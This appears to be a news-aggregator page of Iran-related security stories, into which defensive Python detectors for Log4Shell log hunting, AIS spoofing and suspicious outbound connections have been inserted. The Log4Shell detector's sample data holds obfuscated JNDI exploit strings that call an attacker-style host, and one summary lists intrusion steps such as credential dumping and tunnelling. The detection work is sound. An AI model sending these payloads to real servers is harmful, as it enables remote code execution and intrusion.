Security

Water Pump Used To Get $1 Billion Stuxnet Malware Into Iranian Nuclear Facility (securityweek.com) 36

An anonymous reader quotes a report from SecurityWeek.com: A Dutch engineer recruited by the country's intelligence services used a water pump to deploy the now-infamous Stuxnet malware in an Iranian nuclear facility, according to a two-year investigation conducted by Dutch newspaper De Volkskrant. Stuxnet, whose existence came to light in 2010, is widely believed to be the work of the United States and Israel, its goal being to sabotage Iran's nuclear program by compromising industrial control systems (ICS) associated with nuclear centrifuges. The malware, which had worm capabilities, is said to have infected hundreds of thousands of devices and caused physical damage to hundreds of machines.

De Volkskrant's investigation, which involved interviews with dozens of people, found that the AIVD, the general intelligence and security service of the Netherlands, the Dutch equivalent of the CIA, recruited Erik van Sabben, a then 36-year-old Dutch national working at a heavy transport company in Dubai. Van Sabben was allegedly recruited in 2005 -- a couple of years before the Stuxnet malware was triggered -- after American and Israeli intelligence agencies asked their Dutch counterpart for help. However, the Dutch agency reportedly did not inform its country's government and it was not aware of the full extent of the operation. Van Sabben was described as perfect for the job as he had a technical background, he was doing business in Iran and was married to an Iranian woman.

It's believed that the Stuxnet malware was planted on a water pump that the Dutch national installed in the nuclear complex in Natanz, which he had infiltrated. It's unclear if Van Sabben knew exactly what he was doing, but his family said he appeared to have panicked at around the time of the Stuxnet attack. [...] Michael Hayden, who at the time was the chief of the CIA, did agree to talk to De Volkskrant, but could not confirm whether Stuxnet was indeed delivered via water pumps due to it still being classified information. One interesting piece of information that has come to light in De Volkskrant's investigation is that Hayden reportedly told one of the newspaper's sources that it cost between $1 and $2 billion to develop Stuxnet.

Security

Cyberattack Targets Albanian Parliament's Data System, Halting Its Work (securityweek.com) 2

An anonymous reader quotes a report from SecurityWeek: Albania's Parliament said on Tuesday that it had suffered a cyberattack with hackers trying to get into its data system, resulting in a temporary halt in its services. A statement said Monday's cyberattack had not "touched the data of the system," adding that experts were working to discover what consequences the attack could have. It said the system's services would resume at a later time. Local media reported that a cellphone provider and an air flight company were also targeted by Monday's cyberattacks, allegedly from Iranian-based hackers called Homeland Justice, which could not be verified independently.

Albania suffered a cyberattack in July 2022 that the government and multinational technology companies blamed on the Iranian Foreign Ministry. Believed to be in retaliation for Albania sheltering members of the Iranian opposition group Mujahedeen-e-Khalq, or MEK, the attack led the government to cut diplomatic relations with Iran two months later. The Iranian Foreign Ministry denied Tehran was behind an attack on Albanian government websites and noted that Iran has suffered cyberattacks from the MEK. In June, Albanian authorities raided a camp for exiled MEK members to seize computer devices allegedly linked to prohibited political activities. [...] In a statement sent later Tuesday to The Associated Press, MEK's media spokesperson Ali Safavi claimed the reported cyberattacks in Albania "are not related to the presence or activities" of MEK members in the country.

Privacy

Republican Presidential Candidates Debate Anonymity on Social Media (cnbc.com) 174

Four Republican candidates for U.S. president debated Wednesday — and moderator Megyn Kelly had a tough question for former South Carolina governor Nikki Haley. "Can you please speak to the requirement that you said that every anonymous internet user needs to out themselves?" Nikki Haley: What I said was, that social media companies need to show us their algorithms. I also said there are millions of bots on social media right now. They're foreign, they're Chinese, they're Iranian. I will always fight for freedom of speech for Americans; we do not need freedom of speech for Russians and Iranians and Hamas. We need social media companies to go and fight back on all of these bots that are happening. That's what I said.

As a mom, do I think social media would be more civil if we went and had people's names next to that? Yes, I do think that, because I think we've got too much cyberbullying, I think we've got child pornography and all of those things. But having said that, I never said government should go and require anyone's name.

DeSantis: That's false.

Haley: What I said —

DeSantis: You said I want your name. As president of the United States, her first day in office, she said one of the first things I'm going to do --

Haley: I said we were going to get the millions of bots.

DeSantis: "All social medias? I want your name." A government i.d. to dox every American. That's what she said. You can roll the tape. She said I want your name — and that was going to be one of the first things she did in office. And then she got real serious blowback — and understandably so, because it would be a massive expansion of government. We have anonymous speech. The Federalist Papers were written with anonymous writers — Jay, Madison, and Hamilton, they went under "Publius". It's something that's important — and especially given how conservatives have been attacked and they've lost jobs and they've been cancelled. You know the regime would use that to weaponize that against our own people. It was a bad idea, and she should own up to it.

Haley: This cracks me up, because Ron is so hypocritical, because he actually went and tried to push a law that would stop anonymous people from talking to the press, and went so far to say bloggers should have to register with the state --

DeSantis: That's not true.

Haley: — if they're going to write about elected officials. It was in the — check your newspaper. It was absolutely there.

DeSantis quickly attributed the introduction of that legislation to "some legislator".

The press had already extensively written about Haley's position on anonymity on social media. Three weeks ago Business Insider covered a Fox News interview, and quoted Nikki Haley as saying: "When I get into office, the first thing we have to do, social media companies, they have to show America their algorithms. Let us see why they're pushing what they're pushing. The second thing is every person on social media should be verified by their name." Haley said this was why her proposals would be necessary to counter the "national security threat" posed by anonymous social media accounts and social media bots. "When you do that, all of a sudden people have to stand by what they say, and it gets rid of the Russian bots, the Iranian bots, and the Chinese bots," Haley said. "And then you're gonna get some civility when people know their name is next to what they say, and they know their pastor and their family member's gonna see it. It's gonna help our kids and it's gonna help our country," she continued... A representative for the Haley campaign told Business Insider that Haley's proposals were "common sense."

"We all know that America's enemies use anonymous bots to spread anti-American lies and sow chaos and division within our borders. Nikki believes social media companies need to do a better job of verifying users so we can crack down on Chinese, Iranian, and Russian bots," the representative said.

The next day CNBC reported that Haley "appeared to add a caveat... suggesting Wednesday that Americans should still be allowed to post anonymously online." A spokesperson for Haley's campaign added, "Social media companies need to do a better job of verifying users as human in order to crack down on anonymous foreign bots. We can do this while protecting America's right to free speech and Americans who post anonymously."

Privacy issues had also come up just five minutes earlier in the debate. In March America's Treasury Secretary had recommended the country "advance policy and technical work on a potential central bank digital currency, or CBDC, so the U.S. is prepared if CBDC is determined to be in the national interest."

But Florida governor Ron DeSantis spoke out forcefully against the possibility. "They want to get rid of cash, crypto, they want to force you to do that. They'll take away your privacy. They will absolutely regulate your purchases. On Day One as president, we take the idea of Central Bank Digital Currency, and we throw it in the trash can. It'll be dead on arrival." [The audience applauded.]

The Internet

Russian, Iranian Hackers Pose as Journalists in Emails, UK Says (bloomberg.com) 15

British cybersecurity officials are warning that hacking groups linked to Russia and Iran are duping people into clicking malicious links by impersonating journalists and experts. From a report: The hackers, who have similar goals but are said to be working separately, have sought to steal emails from people working in academia, defense, the media and government, as well as from activists and non-governmental organizations, according to an advisory released on Thursday by the UK's National Cyber Security Centre. "These campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems," said Paul Chichester, the center's director of operations. "We strongly encourage organizations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online."

Privacy

Iran Says Face Recognition Will ID Women Breaking Hijab Laws (wired.com) 156

An anonymous reader quotes a report from Wired: Last month, a young woman went to work at Sarzamineh Shadi, or Land of Happiness, an indoor amusement park east of Iran's capital, Tehran. After a photo of her without a hijab circulated on social media, the amusement park was closed, according to multiple accounts in Iranian media. Prosecutors in Tehran have reportedly opened an investigation. Shuttering a business to force compliance with Iran's strict laws for women's dress is a familiar tactic to Shaparak Shajarizadeh. She stopped wearing a hijab in 2017 because she views it as a symbol of government suppression, and recalls restaurant owners, fearful of authorities, pressuring her to cover her head. But Shajarizadeh, who fled to Canada in 2018 after three arrests for flouting hijab law, worries that women like the amusement park worker may now be targeted with face recognition algorithms as well as by conventional police work.

After Iranian lawmakers suggested last year that face recognition should be used to police hijab law, the head of an Iranian government agency that enforces morality law said in a September interview that the technology would be used "to identify inappropriate and unusual movements," including "failure to observe hijab laws." Individuals could be identified by checking faces against a national identity database to levy fines and make arrests, he said. Two weeks later, a 22-year-old Kurdish woman named Jina Mahsa Amini died after being taken into custody by Iran's morality police for not wearing a hijab tightly enough. Her death sparked historic protests against women's dress rules, resulting in an estimated 19,000 arrests and more than 500 deaths. Shajarizadeh and others monitoring the ongoing outcry have noticed that some people involved in the protests are confronted by police days after an alleged incident -- including women cited for not wearing a hijab. "Many people haven't been arrested in the streets," she says. "They were arrested at their homes one or two days later."

Although there are other ways women could have been identified, Shajarizadeh and others fear that the pattern indicates face recognition is already in use -- perhaps the first known instance of a government using face recognition to impose dress law on women based on religious belief. Mahsa Alimardani, who researches freedom of expression in Iran at the University of Oxford, has recently heard reports of women in Iran receiving citations in the mail for hijab law violations despite not having had an interaction with a law enforcement officer. Iran's government has spent years building a digital surveillance apparatus, Alimardani says. The country's national identity database, built in 2015, includes biometric data like face scans and is used for national ID cards and to identify people considered dissidents by authorities.

Technology

Iranian Attack Drone Found To Contain Parts From More Than a Dozen US Firms (cnn.com) 91

Parts made by more than a dozen US and Western companies were found inside a single Iranian drone downed in Ukraine last fall, according to a Ukrainian intelligence assessment obtained exclusively by CNN. From the report: The assessment, which was shared with US government officials late last year, illustrates the extent of the problem facing the Biden administration, which has vowed to shut down Iran's production of drones that Russia is launching by the hundreds into Ukraine. CNN reported last month that the White House has created an administration-wide task force to investigate how US and Western-made technology -- ranging from smaller equipment like semiconductors and GPS modules to larger parts like engines -- has ended up in Iranian drones.

Of the 52 components Ukrainians removed from the Iranian Shahed-136 drone, 40 appear to have been manufactured by 13 different American companies, according to the assessment. The remaining 12 components were manufactured by companies in Canada, Switzerland, Japan, Taiwan, and China, according to the assessment. The options for combating the issue are limited. The US has for years imposed tough export control restrictions and sanctions to prevent Iran from obtaining high-end materials. Now US officials are looking at enhanced enforcement of those sanctions, encouraging companies to better monitor their own supply chains and, perhaps most importantly, trying to identify the third-party distributors taking these products and re-selling them to bad actors.

Security

Iranian Hackers Breached Federal Agency Using Log4Shell Exploit (bleepingcomputer.com) 27

An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.

"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.
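The advisory tells unpatched Horizon operators to assume compromise and start hunting. The following is an added example, not code from CISA, the FBI or BleepingComputer, of the first step a responder typically takes: scanning web or Horizon access logs for Log4Shell lookup strings. A plain search for the literal "${jndi:" misses most real attempts, because Log4j resolves nested lookups such as ${lower:j}, ${upper:j} and the default-value form ${x:-j} before it logs anything, and attackers use exactly those forms to hide the word "jndi". The script collapses those lookups the way Log4j would, URL-decodes, and only then matches. The log lines, IP addresses (RFC 5737 test ranges) and paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Added example: first-pass hunt for Log4Shell (CVE-2021-44228) lookup strings
# in access logs. Sample data below is constructed, not from a real incident.

# ${lower:x} / ${upper:x} case-mangling lookups
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-value} and the shorthand ${::-value} both evaluate to "value"
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# after normalisation the payload reads ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode, then resolve innermost lookups until nothing changes."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def detect_log4shell(lines):
    """Return (1-based line number, JNDI protocol, normalized line) for each hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


# Constructed sample lines in Apache combined-log shape.
SAMPLE_LINES = [
    # 1: plain payload in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:08:12:01 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    # 2: case-mangling lookups hide the word "jndi"
    '198.51.100.7 - - [10/Dec/2021:08:12:02 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.5:1099/x}"',
    # 3: default-value lookups build the word one character at a time
    '198.51.100.7 - - [10/Dec/2021:08:12:03 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5:1389/b}"',
    # 4: URL-encoded payload in the query string
    '198.51.100.7 - - [10/Dec/2021:08:12:04 +0000] "GET /portal/?x=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.5%2Fcallback%7D HTTP/1.1" 200 "-" "curl/7.68.0"',
    # 5: benign traffic
    '192.0.2.10 - - [10/Dec/2021:08:12:05 +0000] "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, proto, norm in detect_log4shell(SAMPLE_LINES):
        print(f"line {n}: jndi lookup via {proto}: {norm}")
```

A hit is an attempt, not proof of exploitation: corroborate it with outbound LDAP, RMI or DNS traffic from the Tomcat/Horizon JVM at the logged time and, per the advisory, with the XMRig and Ngrok artifacts on the host. Lookups such as ${env:...} or ${date:...} that the attacker nests for other reasons are left alone here; a production hunt should also run the same normalisation over header and request-body logs, not just the access log.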

Cellphones

Is Iran Tracking and Controlling Its Protesters' Phones? (theintercept.com) 67

The Intercept reports that protesters in Iran "have often been left wondering how the government was able to track down their locations or gain access to their private communications — tactics that are frighteningly pervasive but whose mechanisms are virtually unknown."

But The Intercept now has evidence of a new possibility: While disconnecting broad swaths of the population from the web remains a favored blunt instrument of Iranian state censorship, the government has far more precise, sophisticated tools available as well. Part of Iran's data clampdown may be explained through the use of a system called "SIAM," a web program for remotely manipulating cellular connections made available to the Iranian Communications Regulatory Authority. The existence of SIAM and details of how the system works, reported here for the first time, are laid out in a series of internal documents from an Iranian cellular carrier that were obtained by The Intercept.

According to these internal documents, SIAM is a computer system that works behind the scenes of Iranian cellular networks, providing its operators a broad menu of remote commands to alter, disrupt, and monitor how customers use their phones. The tools can slow their data connections to a crawl, break the encryption of phone calls, track the movements of individuals or large groups, and produce detailed metadata summaries of who spoke to whom, when, and where. Such a system could help the government invisibly quash the ongoing protests — or those of tomorrow — an expert who reviewed the SIAM documents told The Intercept.

"SIAM can control if, where, when, and how users can communicate," explained Gary Miller, a mobile security researcher and fellow at the University of Toronto's Citizen Lab. "In this respect, this is not a surveillance system but rather a repression and control system to limit the capability of users to dissent or protest."

Thanks to long-time Slashdot reader mspohr for submitting the article.

Government

Protestors Hack Iran's State-Run TV (bbc.com) 53

"Iran's state-run broadcaster was apparently hacked on air Saturday," reports the BBC, "with a news bulletin interrupted by a protest against the country's leader."

While such incidents are "historically rare," the BBC adds that this one follows "widespread open dissent." It comes after at least three people were shot dead when protesters clashed with security forces in new unrest over the death of Mahsa Amini. Ms Amini was detained in Tehran by morality police for allegedly not covering her hair properly. The 22-year-old Iranian Kurd died in custody on 16 September, three days after her arrest. Her death has sparked an unprecedented wave of protest across the country.

Saturday's TV news bulletin at 21:00 (17:30 GMT) was interrupted with images which included Iran's supreme leader with a target on his head, photos of Ms Amini and three other women killed in recent protests. One of the captions read "join us and rise up", whilst another said "our youths' blood is dripping off your paws".

The interruption lasted only a few seconds before being cut off.

Thanks to Nodsnarb and ttyler (long-time Slashdot reader #20,687) for sharing the story.

Communications

Elon Musk Activates Starlink For Iranian Citizens (teslarati.com) 42

Elon Musk announced that he was activating Starlink in response to U.S. Secretary of State Antony Blinken's tweet announcing the issuing of a General License to provide the Iranian people with access to digital communications. Teslarati reports: Currently, in Iran, massive protests are happening as a result of the death of 22-year-old Mahsa Amini, who was detained by the morality police for her head scarf not being properly worn. Although she had no known heart-related health problems, the police said she suddenly died of heart failure. Eyewitnesses said that she was beaten and her head hit the side of a police car. This along with leaked medical scans suggested cerebral hemorrhage and stroke. In response to her death, there have been several large-scale protests across Iran that received international support from world leaders, celebrities, and organizations.

The Iranian government sided with the morality police and has been suppressing the protests, shooting protestors with metal pellets and birdshot, and deploying tear gas and water cannons. The government also blocked access to many apps including Instagram and WhatsApp and limited internet access to prevent protestors from organizing. This is where Starlink comes in. A few days ago, Elon Musk said that Starlink would seek exemption from Iranian sanctions. This was in response to @Erfankasraie who asked if Elon could provide Starlink to the Iranian people. "It could be a game changer for the future." Elon also responded, "OK," to @agusantonetti who asked if he could do the same for other countries under a dictatorship such as Cuba.
Further reading: As Unrest Grows, Iran Restricts Access To Instagram, WhatsApp

Security

US Cyber-Defense Agency Urges Companies To Automate Threat Testing (bloomberg.com) 13

The US government's cyber defense agency is recommending for the first time that companies embrace automated continuous testing to protect against longstanding online threats. From a report: The guidance, from a cluster of US and international agencies published on Wednesday, urges businesses to shore up their defenses by continually validating their security program against known threat behaviors, rather than a more piecemeal approach. "The authoring agencies recommend continually testing your security program, at scale," according to an alert from the Cybersecurity and Infrastructure Security Agency and several other US and international agencies. The alert warned malicious cyber actors allegedly affiliated with the Iranian Government's Islamic Revolutionary Guard Corps are exploiting known vulnerabilities for ransom operations. An official at CISA told Bloomberg ahead of the announcement that emulating adversaries and testing against them is key to defending against cyberattacks. Central to the effort is a freely available list of cyberattackers' most common tactics and procedures that was first made public in 2015 by MITRE, a federally funded research and development center, and is now regularly updated. While many organizations and their security contractors already consult that list, too few check if their systems can actually detect and overcome them, the CISA official said.

Security

Albania Cuts Diplomatic Ties With Iran Over July Cyberattack (apnews.com) 23

Albania cut diplomatic ties with Iran and expelled the country's embassy staff over a major cyberattack nearly two months ago that was allegedly carried out by Tehran on Albanian government websites, the prime minister said Wednesday. From a report: The move by Albania, a NATO country, was the first known case of a country cutting diplomatic relations over a cyberattack. The White House vowed unspecified retaliation Wednesday against Iran for what it called "a troubling precedent for cyberspace." In a statement, the White House said it has had experts on the ground for weeks helping Albania and had concluded Iran was behind the "reckless and irresponsible" attack and subsequent hack-and-leak operation.

The government's decision was formally delivered to the Iranian Embassy in Tirana, the capital, in an official note, Prime Minister Edi Rama said. All embassy staff, including diplomatic and security personnel, were ordered to leave Albania within 24 hours. On July 15, a cyberattack temporarily shut down numerous Albanian government digital services and websites. Rama said an investigation determined that the cyberattack wasn't carried out by individuals or independent groups, calling it "state aggression."

Transportation

How Shady Ships are Spoofing Their Locations with Fake GPS Coordinates (nytimes.com) 92

Slashdot reader artmancc writes: Like aircraft, many of the world's ocean-going vessels are required to have transponders that broadcast their location. The information is public and can be seen on websites such as AIS Marine Traffic. But according to an analysis reported in The New York Times, a maritime data company called Windward "has uncovered more than 500 cases of ships manipulating their satellite navigation systems to hide their locations."

The article, by Anatoly Kurmanaev, highlights the Cyprus-registered tanker Reliant, which was observed taking on oil at a Venezuelan refinery last December. At the same time, however, the ship was reporting its position as some 300 nautical miles (about 500 kilometers) away, "drifting innocuously off the coast of St. Lucia."

It's illegal (under international law), but the rapidly-growing practice lets ships circumvent international laws and sanctions, the Times reports, and "could transform how goods are moved around the world, with profound implications for the enforcement of international law, organized crime and global trade." Its use has included Chinese fishing fleets hiding operations in protected waters off South America, tankers concealing stops in Iranian oil ports, and container ships obfuscating journeys in the Middle East. A U.S. intelligence official, who discussed confidential government assessments on the condition of anonymity, said the deception tactic had already been used for weapons and drug smuggling. After originally discovering the deception near countries under sanction, Windward has since seen it spread as far as Australia and Antarctica.

"It's a new way for ships to transmit a completely different identity," said Matan Peled, a founder of Windward. "Things have unfolded at just an amazing and frightening speed...." The spread of AIS manipulation shows how easy it has become to subvert its underlying technology — the Global Positioning System, or GPS — which is used in everything from cellphones to power grids, said Dana Goward, a former senior U.S. Coast Guard official and the president of Resilient Navigation and Timing Foundation, a Virginia-based GPS policy group. "This shows just how vulnerable the system is," he said.
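The Reliant case above is the simplest kind of AIS spoofing to catch: a vessel whose reported track, or the gap between its reported and independently observed positions, implies a speed no ship can make. The following is an added example, not Windward's method or anything from the Times article, of that one heuristic: compute the great-circle distance between consecutive position reports and flag any pair that would require the vessel to exceed a plausible speed. The track, timestamps and coordinates are constructed for the example; a real pipeline would feed it decoded AIS position reports (or a mix of AIS and satellite sightings) per vessel.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from math import asin, cos, radians, sin, sqrt

# Added example: flag position "teleports" in a vessel track. Constructed data.

EARTH_RADIUS_NM = 3440.065  # mean Earth radius in nautical miles (6371 km)


@dataclass(frozen=True)
class Report:
    when: datetime
    lat: float  # decimal degrees, north positive
    lon: float  # decimal degrees, east positive


def great_circle_nm(a: Report, b: Report) -> float:
    """Haversine distance between two reports, in nautical miles."""
    phi1, phi2 = radians(a.lat), radians(b.lat)
    dphi = radians(b.lat - a.lat)
    dlmb = radians(b.lon - a.lon)
    h = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_NM * asin(sqrt(h))


def flag_implausible_speed(track, max_knots=50.0):
    """Return (index, implied knots) for every report that could not have been
    reached from the previous report at or below max_knots.

    Reports whose timestamp does not increase are skipped rather than divided by
    zero; out-of-order or duplicated messages are common in raw AIS feeds.
    """
    flags = []
    for i in range(1, len(track)):
        dt_hours = (track[i].when - track[i - 1].when).total_seconds() / 3600.0
        if dt_hours <= 0:
            continue
        knots = great_circle_nm(track[i - 1], track[i]) / dt_hours
        if knots > max_knots:
            flags.append((i, knots))
    return flags


def _t(hours):
    return datetime(2021, 12, 1, 0, 0, tzinfo=timezone.utc) + timedelta(hours=hours)


# Constructed track: a tanker moving at ~15 kn, then a report ~290 nm away one
# hour later (the kind of jump a spoofed position produces), then slow again.
TRACK = [
    Report(_t(0), 10.00, -64.00),
    Report(_t(1), 10.15, -64.20),
    Report(_t(2), 13.90, -61.00),
    Report(_t(3), 13.95, -61.05),
]

if __name__ == "__main__":
    for i, knots in flag_implausible_speed(TRACK):
        print(f"report {i} at {TRACK[i].when:%H:%M}Z implies {knots:.0f} kn")
```

The threshold is deliberately loose: 50 knots is well above any merchant hull, so a flag means either spoofing or a corrupt message, and both deserve a look. A spoofed track that is internally consistent (a fake position that drifts slowly, as in the Reliant case) only shows up when the first or last spoofed report is compared with a genuine one, which is why analysts pair AIS with satellite imagery or port records rather than trusting the feed alone.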

Security

FBI Blocked Planned Cyberattack on Children's Hospital (apnews.com) 35

The FBI thwarted a planned cyberattack on a children's hospital in Boston that was to have been carried out by hackers sponsored by the Iranian government, FBI Director Christopher Wray said Wednesday. From a report: Wray told a Boston College cybersecurity conference that his agents learned of the planned digital attack from an unspecified intelligence partner and got Boston Children's Hospital the information it needed last summer to block what would have been "one of the most despicable cyberattacks I've seen."

"And quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids who depended on it," Wray said. The FBI chief recounted that anecdote in a broader speech about ongoing cyber threats from Russia, China and Iran and the need for partnerships between the U.S. government and the private sector.

Social Networks

Instagram Moderators Say Iran Offered Them Bribes to Remove Accounts (bbc.com) 18

The BBC reports: A Persian-language content moderator for Instagram and a former content moderator have said Iranian intelligence officials offered them money to remove Instagram accounts of journalists and activists....

Both content moderators also accused some Iranian colleagues of exhibiting "pro-regime bias" when reviewing posts on the photo-sharing service. They spoke to the BBC after many Iranian Instagram users complained that posts about recent anti-government protests in their country had been deleted. Instagram's owner, Meta Platforms, and the third-party company it uses to moderate content said there was no validity to the claims....

The protests received very little coverage on Iranian state media, meaning that Iranians had to rely on Instagram and other social media sites to learn what was happening on the ground. As the unrest continued, users noticed that some videos posted on Instagram were being removed....

The former content moderator told the BBC that he "personally knew some reviewers who supported the Iranian regime and received instructions from Iran"....

All three interviewees said it was likely that some videos of the protests were removed because they included people shouting: "Death to Khamenei".

Meta has previously said that its guidelines around incitement of violence prohibit calls for the death of a head of state. However, in Iran the phrase "Death to..." is commonly chanted at protests to express discontent with something or someone, rather than to express an actual threat.

The Military

Russia's Military Is Now On Full Display In Google Maps Satellite View (arstechnica.com) 67

An anonymous reader quotes a report from Ars Technica: On Monday, the Internet got a much better look at military facilities across Russia. Google Maps stopped obscuring the sensitive locations due to Russia's ongoing invasion of its neighbor Ukraine. The Ukrainian Armed Forces announced the end of Google's censorship of Russia's bases on Twitter. Thanks to former US President Donald Trump, we know that the 0.5 m per pixel resolution available on Google Maps' satellite view is a far cry from the images available to the US government. But it will be invaluable to the growing mass of open source intelligence analysts. Since Russia's invasion of Ukraine began in late February, the OSINT community on Twitter has been cataloging Russian losses by geolocating images of destroyed tanks, fighting vehicles, aircraft, and cruise missile attacks.

Twitter users have already identified some interesting sights. Images taken of a Russian airbase at Lipetsk show partially disassembled MiG-31s (or perhaps MiG-25s). Another shows several Sukhoi fighter jets painted in patriotic colors, at least one of which is also missing its wings. Zhukovsky Airport near Moscow shows some oddities parked outside thanks to its role as a test flight center, including a Buran shuttle and a Sukhoi Su-47 technology demonstrator.
UPDATE: A Google spokesperson told Ars that the company hasn't changed anything with regard to blurring out sensitive sites in Russia, so perhaps none of us were looking closely until now.

Security

VMware Horizon Servers Are Under Active Exploit By Iranian State Hackers (arstechnica.com) 17

An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.

Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: execute reconnaissance commands; create a backdoor user and add it to the network administrators group; harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.

The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
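To turn that hunting tip into something repeatable, here is an added example (not code from Ars Technica or SentinelOne) that scans constructed proxy log lines for outbound connections to the five services named above. The log format, client addresses and URLs are assumed; the matcher treats subdomains as hits but ignores lookalike hosts such as pastebin.com.evil.example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Public services the SentinelOne write-up quoted above names as used by TunnelVision.
WATCHLIST = {
    "transfer.sh", "pastebin.com", "webhook.site", "ufile.io",
    "raw.githubusercontent.com",
}

# Constructed sample proxy log (hypothetical format):
# "<timestamp> <client_ip> <method> <url> <status>"
SAMPLE_PROXY_LOG = """\
2022-02-17T10:01:03Z 10.0.5.12 GET https://www.example.com/index.html 200
2022-02-17T10:02:44Z 10.0.5.40 GET https://transfer.sh/AbCd12/tool.zip 200
2022-02-17T10:03:10Z 10.0.5.40 POST https://pastebin.com/api/api_post.php 200
2022-02-17T10:04:55Z 10.0.5.40 GET https://raw.githubusercontent.com/u/r/main/x.ps1 200
2022-02-17T10:05:02Z 10.0.5.12 GET https://pastebin.com.evil.example/ 200
2022-02-17T10:06:00Z 10.0.5.77 GET https://api.webhook.site/health 200
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def matched_service(host: str) -> Optional[str]:
    """Return the watchlist entry that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for svc in WATCHLIST:
        if host == svc or host.endswith("." + svc):
            return svc
    return None  # lookalikes such as pastebin.com.evil.example fall through here


def find_suspect_connections(log_text: str) -> list:
    """Parse each log line and keep those whose destination host is on the watchlist."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        host = urlsplit(m["url"]).hostname or ""
        svc = matched_service(host)
        if svc:
            findings.append({"ts": m["ts"], "client": m["client"], "host": host, "service": svc})
    return findings


def clients_by_hit_count(findings: list) -> list:
    """Rank internal clients by number of watchlist hits, busiest first, to focus triage."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
```

A single hit on these services is often benign developer traffic; the ranking is there so that one host talking to several of them in a short window is what gets looked at first.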

Security

Israel and Iran Broaden Cyberwar To Attack Civilian Targets (nytimes.com) 31

